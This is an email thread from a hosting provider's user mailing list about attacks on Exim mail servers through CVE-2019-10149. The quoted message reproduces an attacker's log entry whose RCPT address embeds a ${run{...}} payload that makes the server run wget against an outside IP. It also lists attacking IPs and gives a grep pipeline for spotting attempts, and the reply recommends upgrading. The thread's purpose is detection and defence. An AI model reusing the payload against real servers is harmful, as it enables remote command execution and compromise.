I have just read up on this, after seeing this email. It appears that over
90% of exim4 servers are running vulnerable unpatched versions of the
software. It also seems that the malware involved also sets up a cron job
under user root to go on downloading other nasty stuff.
It seems that the best preventative step is to ensure that your exim is up
to date running version >= 4.92. The only cure That I can see in the sites
I have looked at is a complete nuking and format. This is a nasty brute
On Sun, 23 Jun 2019 at 04:25, Andy Smith <andy@???> wrote:
> Hello,
>
> I've just ran a grep on all of my mail logs for the string "run{" to
> see who's been trying to exploit CVE-2019-10149. A successful match
> looks like this on my MTA (Exim):
>
> 2019-06-19 14:57:19 H=li810-176.members.linode.com (service.com)
> [104.237.134.176] F=<support@???> rejected RCPT
> <root+${run{\x2Fbin\x2Fsh\t-c\t\x22wget\x2064.50.180.45\x2ftmp\x2f85.119.82.70\
> x22}}@???>: Unrouteable address
>
> This appears to be attempting to execute:
>
> sh -c "wget 64.50.180.45/tmp/85.119.82.70
>
> on my host. I assume that the attacker watches their HTTP logs for
> requests for /tmp/85.119.82.70 and then they know they've found an
> exploitable host.
>
> Here's a list of offenders sorted by attempt count:
>
> Count Attacker Country AS
>
> -------------------------------------------------------------------------------------------------
> 18 89.248.171.57 ( scanner20.openportstats.com) NL
> INT-NETWORK, SC [AS202425]
> 8 163.172.157.143 (143-157-172-163.rev.cloud.scaleway.com) GB
> AS12876, FR [AS12876]
> 6 104.237.134.176 (li810-176.members.linode.com) US LINODE-AP
> Linode, LLC, US [AS63949]
> 3 149.56.142.192 ( 192.ip-149-56-142.net) CA OVH, FR
> [AS16276]
> 3 104.200.137.239 ( mx239.odesktrack.com) US
> TOTAL-SERVER-SOLUTIONS - Total Server Solutions L.L.C., US [AS46562]
> 2 27.69.172.229 ( localhost) VN VIETEL-AS-AP
> Viettel Group, VN [AS7552]
> 1 95.139.230.110 (node-110-230-139-95.domolink.tula.net) RU
> ROSTELECOM-AS, RU [AS12389]
> 1 79.173.123.131 ( Unset reverse DNS) RU TKTOR, RU
> [AS44270]
> 1 46.150.228.178 ( Unset reverse DNS) RU ABRIKOS-AS,
> RU [AS196768]
> 1 27.70.156.161 ( localhost) VN VIETEL-AS-AP
> Viettel Group, VN [AS7552]
> 1 27.69.172.239 ( localhost) VN VIETEL-AS-AP
> Viettel Group, VN [AS7552]
> 1 27.69.172.214 ( localhost) VN VIETEL-AS-AP
> Viettel Group, VN [AS7552]
>
> Most worrying, a BitFolk IP was amongst my findings. i.e. there is a
> BitFolk customer VPS also doing this. Most likely they have already
> been compromised by this technique. I've removed them from the
> results above but I expect if you search your own logs you'll find
> them. They have already been notified.
>
> I created the above output with this script:
>
> https://gist.github.com/grifferz/f92a9c885443a0db8776c4f2f10f914f
>
> To use it in this case would be something like:
>
> $ zcat -f /var/log/exim4/mainlog* \
> | grep "run{" \
> | awk -F'[' '{ gsub(/\].*/, "", $2); print $2 }' \
> | sort | uniq -c | sort -rn | ~/attackers.sh
>
> The awk is separating an IP address out of the [1.2.3.4]. The
> sort/uniq/sort is generating an event count. attackers.sh is merely
> getting extra info about the IP address.
>
> Cheers,
> Andy
>
> --
> https://bitfolk.com/ -- No-nonsense VPS hosting
> _______________________________________________
> users mailing list
> users@???
> https://lists.bitfolk.com/mailman/listinfo/users
>
